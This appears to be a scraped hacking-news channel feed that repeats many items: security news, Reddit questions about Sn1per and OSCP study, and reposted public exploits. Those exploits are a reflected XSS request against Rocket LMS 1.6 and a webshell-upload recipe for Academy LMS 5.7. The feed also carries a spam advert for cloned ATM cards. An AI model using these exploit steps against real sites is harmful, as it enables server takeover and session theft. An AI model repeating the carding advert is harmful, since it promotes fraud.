Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Gartner Survey Shows 75% of Organizations Are Pursuing Security Vendor Consolidation in 2022
.
___________________________
@hacking_Attack
@Hacking_Video
Gartner Survey Shows 75% of Organizations Are Pursuing Security Vendor Consolidation in 2022
.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Gartner Survey Shows 75% of Organizations Are Pursuing Security Vendor Consolidation in 2022
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Ohio Raises a Volunteer Army to Fight Election Hacking
https://external-preview.redd.it/FH3t4REaOfvjldMSvVbJsx-uR68paDwA_NhG0vO9GbY.jpg?width=640&crop=smart&auto=webp&s=153376ecdff258352a8ae81be038e03ff099c52b submitted by /u/Straganaugth
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Ohio Raises a Volunteer Army to Fight Election Hacking
https://external-preview.redd.it/FH3t4REaOfvjldMSvVbJsx-uR68paDwA_NhG0vO9GbY.jpg?width=640&crop=smart&auto=webp&s=153376ecdff258352a8ae81be038e03ff099c52b submitted by /u/Straganaugth
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Reddit
From the hacking community on Reddit: Ohio Raises a Volunteer Army to Fight Election Hacking
Posted by [Deleted Account] - 84 votes and 7 comments
hacking: security in practice
Understanding Sn1per
I have been using Sn1per to test websites. I understand that it's not really a tool in itself but a collection of tools that run in an automated fashion. I should probably learn each tool individually as well.
If Sn1per finds an exploit that it has a module for will it automatically open up a Meterpreter session? Also, are there any other good programs like Sn1per?
submitted by /u/z0mbiechris
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Understanding Sn1per
I have been using Sn1per to test websites. I understand that it's not really a tool in itself but a collection of tools that run in an automated fashion. I should probably learn each tool individually as well.
If Sn1per finds an exploit that it has a module for will it automatically open up a Meterpreter session? Also, are there any other good programs like Sn1per?
submitted by /u/z0mbiechris
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Understanding Sn1per
I have been using Sn1per to test websites. I understand that it's not really a tool in itself but a collection of tools that run in an automated...
hacking: security in practice
Now that Mandiant is owned by Google, who is the biggest pure play cybersecurity consulting services firm?
The only other pure play cybersecurity consulting services firm that has as high a profile seems to be Dragos - anybody have other ones?
submitted by /u/AJGrayTay
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Now that Mandiant is owned by Google, who is the biggest pure play cybersecurity consulting services firm?
The only other pure play cybersecurity consulting services firm that has as high a profile seems to be Dragos - anybody have other ones?
submitted by /u/AJGrayTay
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Reddit
From the hacking community on Reddit
Explore this post and more from the hacking community
hacking: security in practice
How do you all continue to learn and advance your knowledge about the cybersecurity?
I just passed my oscp and am looking to start diving into a little more depth. How do you all continue to study or what do you all use as resources other than hackthebox or TryHackMe or PG? I have bought a couple books to go through, but wanted to hear what you all use.
submitted by /u/_ghostman_
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
How do you all continue to learn and advance your knowledge about the cybersecurity?
I just passed my oscp and am looking to start diving into a little more depth. How do you all continue to study or what do you all use as resources other than hackthebox or TryHackMe or PG? I have bought a couple books to go through, but wanted to hear what you all use.
submitted by /u/_ghostman_
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
How do you all continue to learn and advance your knowledge about...
I just passed my oscp and am looking to start diving into a little more depth. How do you all continue to study or what do you all use as...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Rocket LMS 1.6 Cross Site Scripting
https://3.bp.blogspot.com/-Qhp4qePCt4w/WWlvgnoLBHI/AAAAAAAAIQQ/Pg-5D4V1nfk8Sq6EZO_I88mZqTiN0MsZgCLcBGAs/s1600/h89.png
Rocket LMS version 1.6 suffers from a cross site scripting vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Rocket LMS 1.6 Cross Site Scripting
https://3.bp.blogspot.com/-Qhp4qePCt4w/WWlvgnoLBHI/AAAAAAAAIQQ/Pg-5D4V1nfk8Sq6EZO_I88mZqTiN0MsZgCLcBGAs/s1600/h89.png
Rocket LMS version 1.6 suffers from a cross site scripting vulnerability.
SHA-256 |
21a150d6f7bd763c17a361b4b333dd7a6dff2269a57ce56b55a37a298f1c638fDownload
# Exploit Title: Rocket LMS - Learning Management System Reflected Cross Site Scripting
# Exploit Author: th3d1gger
# Vendor Homepage: https://codecanyon.net
# Software Link: https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735
# Version: Version 1.6
# Tested on Ubuntu 18.04
-------Request-----------
GET /search?search=%3Cbody%2Fbody%2Fbody%2FOn%2FOnLoAd%3Dconsole.log%281%29%3E%3C%21-- HTTP/1.1
Host: localhost
sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
sec-ch-ua-platform: "Linux"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: empty
Referer: http://localhost/search?search=%3Cbody%2Fbody%2Fbody%2FOn%2FOnLoAd%3Dconsole.log%281%29%3E%3C%21--
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: allow=1; XSRF-TOKEN=eyJpdiI6ImN0MTZwSkxBTEF0VGVtTmo4cmdxSUE9PSIsInZhbHVlIjoidlEvSDRITWdRaXpXU0Q1amE1cSsxTUNZc0lSVHdRWVVxaUp1cURrM3JQSGNTTTQxRUVjSWdGbUtPZVBWV3FiRk5yU3VHNzBZTU4rNDA1VDlsS1BHdC9FRExpbjdhakhDUk56d1l1VGxlSjdFSWVuR2ZQZXBDamt1MVVkdHBRTUsiLCJtYWMiOiJhOTY5YzU2MzE3NmRjMWM0NzBkNmVlNWI1NmU5MjExZGRhZGU2NzYwY2Y5M2FmNzI5YjViMTRmNjI5Y2E0NjdiIn0%3D; rocketlms_session=eyJpdiI6Im9YRVkvTVYyQkZqNkVKR05xK3VVVGc9PSIsInZhbHVlIjoiS1plaFpXSVVJVGdiSE9vK3MxbTk2S3FSMmx6T1dnSGduZ3RZZERlc28xbmRrSWpuSStpMml0L2hkdFdXS3NmWnhHdlV1MXNicUI5Q2ErR1cwODdkYXFEbnd6WlVTZVlCbEZOZVg0VjJrc2J0ZFNVMzd6TW8rVHE5QXlkdEpmS1UiLCJtYWMiOiJhMDBiNjhmNTA1ZDM3ODMzNGQ2MDA4YTA5Nzk0ZDlhMTM5NjM1OWEwNGZmOTViNmU2MGE2YmQ2NWQwMGUzYWMwIn0%3D
Connection: close
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Rocket LMS 1.6 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
TIBCO JasperReports Server 8.0.2 Community Edition Code Execution
___________________________
@hacking_Attack
@Hacking_Video
TIBCO JasperReports Server 8.0.2 Community Edition Code Execution
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
TIBCO JasperReports Server 8.0.2 Community Edition Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Academy Learning Management System 5.7 Shell Upload
https://4.bp.blogspot.com/-rlkVZrkp7Nk/WWlvMMd1AsI/AAAAAAAAIMM/kgTZoxpDP8Ypbt5o2Ma3tAKenLk3_TLPQCLcBGAs/s1600/h18.png
Academy Learning Management System version 5.7 suffers from a remote shell upload vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Academy Learning Management System 5.7 Shell Upload
https://4.bp.blogspot.com/-rlkVZrkp7Nk/WWlvMMd1AsI/AAAAAAAAIMM/kgTZoxpDP8Ypbt5o2Ma3tAKenLk3_TLPQCLcBGAs/s1600/h18.png
Academy Learning Management System version 5.7 suffers from a remote shell upload vulnerability.
SHA-256 |
8f5ea1ed03e514169afbef198fca84d3a923d2ba76402fc2c21d5c8fce52443aDownload
# Exploit Title: Academy Learning Management System 5.7 Shell Upload
# Exploit Author: th3d1gger
# Vendor Homepage: https://codecanyon.net
# Software Link: https://codecanyon.net/item/academy-course-based-learning-management-system/22703468
# Version: 5.7
# Tested on Ubuntu 18.04
Totally wrong architecture for uploading zip files on install addon
---Vulnerable Source Code ---
$zipped_file_name = $_FILES['addon_zip']['name'];
if (!empty($zipped_file_name)) {
// Create update directory.
$dir = 'uploads/addons';
if (!is_dir($dir))
mkdir($dir, 0777, true);
$path = "uploads/addons/".$zipped_file_name;
if (class_exists('ZipArchive')) {
move_uploaded_file($_FILES['addon_zip']['tmp_name'], $path);
//Unzip uploaded update file and remove zip file.
$zip = new ZipArchive;
$zip->open($path);
$zip->extractTo('uploads/addons');
$zip->close();
unlink($path);
}else{
$this->session->set_flashdata('error_message', get_phrase('your_server_is_unable_to_extract_the_zip_file').'. '.get_phrase('please_enable_the_zip_extension_on_your_server').', '.get_phrase('then_try_again'));
redirect(site_url('admin/addon'), 'refresh');
}
---Exploit------
get request route "/admin/addon/add" at admin panel.
And then for example download "certificate addon" nulled version.
in addons config.json file
add
"""
{
"root_directory" : "uploads/addons/certificate/others/shell.php",
"update_directory" : "uploads/certificates/shell.php"
},
"""
add your webshell to others folder in addon.
click install addon button.
And ta daa !
->get request https://your-url/uploads/certificates/shell.php
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Academy Learning Management System 5.7 Shell Upload
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
PentesterAcademy updated??
https://www.reddit.com/r/Pentesting/comments/xde9fw/pentesteracademy_updated/
i saw few videos and the videos look old , are they any good for 2022? submitted by /u/General_Roof9555 (https://www.reddit.com/user/General_Roof9555)
[link] (https://www.reddit.com/r/Pentesting/comments/xde9fw/pentesteracademy_updated/) [comments] (https://www.reddit.com/r/Pentesting/comments/xde9fw/pentesteracademy_updated/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/Pentesting/comments/xde9fw/pentesteracademy_updated/
i saw few videos and the videos look old , are they any good for 2022? submitted by /u/General_Roof9555 (https://www.reddit.com/user/General_Roof9555)
[link] (https://www.reddit.com/r/Pentesting/comments/xde9fw/pentesteracademy_updated/) [comments] (https://www.reddit.com/r/Pentesting/comments/xde9fw/pentesteracademy_updated/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
PentesterAcademy updated??
i saw few videos and the videos look old , are they any good for 2022?
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
DO ALL TRANSFERS CASHAPP WESTERN UNION PAYPAL BLANK CLOND ATM CREDIT CARDS
ALBERT’S CASH TEAM SERVICE WORLDWIDE(GET RICH NOW/SOLVE ALL PROBLEM NOW)WHERE ALL YOUR FINANCIAL DREAMS COME THROUGH AND THE END OF ALL…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
DO ALL TRANSFERS CASHAPP WESTERN UNION PAYPAL BLANK CLOND ATM CREDIT CARDS
ALBERT’S CASH TEAM SERVICE WORLDWIDE(GET RICH NOW/SOLVE ALL PROBLEM NOW)WHERE ALL YOUR FINANCIAL DREAMS COME THROUGH AND THE END OF ALL…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
DO ALL TRANSFERS CASHAPP WESTERN UNION PAYPAL BLANK CLOND ATM CREDIT CARDS
ALBERT’S CASH TEAM SERVICE WORLDWIDE(GET RICH NOW/SOLVE ALL PROBLEM NOW)WHERE ALL YOUR FINANCIAL DREAMS COME THROUGH AND THE END OF ALL…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
How i got my first hall of fame.
https://cdn-images-1.medium.com/max/1080/1*pGVaoTlnAGvf3LH4JbXjeg.jpeg
Hello everyone,
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
How i got my first hall of fame.
https://cdn-images-1.medium.com/max/1080/1*pGVaoTlnAGvf3LH4JbXjeg.jpeg
Hello everyone,
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
How i got my first hall of fame.
Hello everyone,